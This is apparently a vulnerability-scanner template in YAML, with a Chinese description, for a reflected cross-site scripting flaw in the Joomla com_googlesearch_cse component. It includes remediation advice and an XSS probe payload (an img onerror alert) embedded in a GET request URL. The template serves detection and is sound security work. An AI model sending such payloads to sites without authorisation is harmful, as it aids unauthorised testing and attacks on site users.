id: Joomla-sqli-googlesearch
info:
  name: Joomla_GoogleSearch_(CSE)_3.0.2_XSS_Vulnerabilities
  author:
  - 折跃
  description: |-
    Joomla! com_googlesearch_cse组件跨站脚本漏洞
    Joomla! 是一款开放源码的内容管理系统(CMS)。

    Joomla! com_googlesearch_cse组件存在跨站脚本漏洞，该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在用户浏览器中执行任意脚本代码。
  severity: medium
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：
    http://www.joomla.org/

    临时修复方案：
    1、对输入(和URL参数)进行过滤，对输出进行编码，白名单和黑名单结合。也就是对提交的所有内容进行过滤，对url中的参数进行过滤，过滤掉会导致脚本执行的相关内容；然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过，但是也还是会拦截很大一部分的XSS攻击；最后对字符进行白名单或者黑名单限制。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'0x2334171512353333')
    - '!contains(body,"index.php%3Foption%3Dcom_googlesearch_cse%26n%3D30")'
    - '!contains(body,"index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=0170936873967")'
  path:
  - '{{BaseURL}}/index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(''0x2334171512353333>'')%3E&sa=Search&hl=en'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
